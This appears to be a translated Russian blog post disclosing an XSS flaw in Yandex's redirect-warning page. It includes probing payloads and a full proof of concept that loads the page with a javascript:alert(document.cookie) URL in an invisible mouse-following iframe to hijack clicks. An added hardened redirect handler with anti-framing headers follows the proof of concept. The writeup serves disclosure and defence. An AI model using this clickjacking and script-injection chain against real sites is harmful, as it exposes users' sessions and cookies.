"><script>alert('xss');</script>
and looked at the page source to see what is filtered and what is not. Here is a line from the source:
<span onclick="return {'b\-form\-button':{name:'b\-form\-button', 'retpath': "\"><script>alert('xss')"}}"
Well, I thought, boring: everything is filtered. Then I looked more closely and noticed that Yandex does not prepend a protocol to the URL, so there is room to play here. I entered javascript:alert('xss');
and it works! Unfortunately, only when you click the "Return" button. You can try it. Already more interesting; digging further...
javascript:alert('ahoy!');
and clicked the link. It works! Now we try to put the vulnerable address into an iframe. Hooray, there are no checks. Try it. Great, let's go on.
<!DOCTYPE html>
<html>
<head>
<style type="text/css">
body { margin:0; padding:0; }
#helper { position: absolute; overflow: hidden; width: 200px; height: 13px; }
#ifr { position: relative; top: -180px; left: -58px; }
</style>
</head>
<body>
<div id="helper">
<div style="width: 100%; height: 300px">
<iframe id="ifr" src="http://yandex.ru/redir_warning/?url=javascript:alert(document.cookie)" width="1000px" height="300" frameborder="no" scrolling="no"></iframe>
</div>
</div>
</body>
</html>

var el;
window.onload = function() {
    var ifr = document.getElementById("ifr");
    // per-engine offset, disabled because the CSS above already sets top: -180px
    // if (navigator.userAgent.toLowerCase().indexOf("webkit") != -1) {
    //     ifr.style.top = "-180px";
    // } else {
    //     ifr.style.top = "-190px";
    // }
    el = document.getElementById("helper");
    window.onmousemove = onmove;
}
function onmove(e) {
    el.style.left = (e.pageX - 50) + "px";
    el.style.top = (e.pageY - 12) + "px";
    return false;
}
<iframe id="yandex" src="http://yandex.ru/" width="100%" height="100%" frameborder="no"></iframe>
<div id="overlay"></div>
#helper { z-index: 20000; opacity: 0; }
#yandex { z-index: 10; }
#overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 20; }
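The two weaknesses the post chains together are a redirect page that accepts a scheme-less or javascript: URL and a page that can be loaded inside a third-party iframe. The following is an added example, not code from the original post or from Yandex, of how a redirect-warning endpoint closes both (Node.js; the function names are assumptions):

```javascript
// Added example, not code from the original post or from Yandex: a hardened
// version of the redirect-warning pattern discussed above (Node.js; all
// function names are assumptions). It closes both defects the post relies on:
// a user-supplied url parameter is only accepted as an absolute http(s) URL,
// and the warning page refuses to be framed.

// Returns a normalised absolute http(s) URL, or null if the value must not be
// used as a link target.
function safeRedirectTarget(raw) {
  if (typeof raw !== "string") return null;
  let parsed;
  try {
    // No base URL is given on purpose: scheme-less input such as "yandex.ru"
    // or "//evil.example" fails to parse and is rejected rather than guessed at.
    parsed = new URL(raw.trim());
  } catch (e) {
    return null;
  }
  // The WHATWG parser lower-cases the scheme, so "JavaScript:" is caught too.
  // Allow-listing http/https also rules out data:, vbscript:, file: and so on.
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return null;
  return parsed.href;
}

// Response headers for the warning page itself: forbid embedding in a frame,
// which is what the invisible-iframe overlay in the post depends on.
function warningPageHeaders() {
  return {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
  };
}

// Renders the warning page. The href is HTML-attribute-escaped, and when the
// target is rejected no link is emitted at all.
function renderWarningPage(raw) {
  const target = safeRedirectTarget(raw);
  if (target === null) {
    return "<p>The requested link is not valid.</p>";
  }
  const escaped = target.replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]);
  return `<p>You are leaving the site.</p><a href="${escaped}">Continue</a>`;
}
```

Rejecting scheme-less input outright (instead of prepending http://) is the point: a value that parses only because the server guessed a scheme is exactly the case the post abuses.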
http://help.yandex.ru/
Source: https://habr.com/ru/post/126800/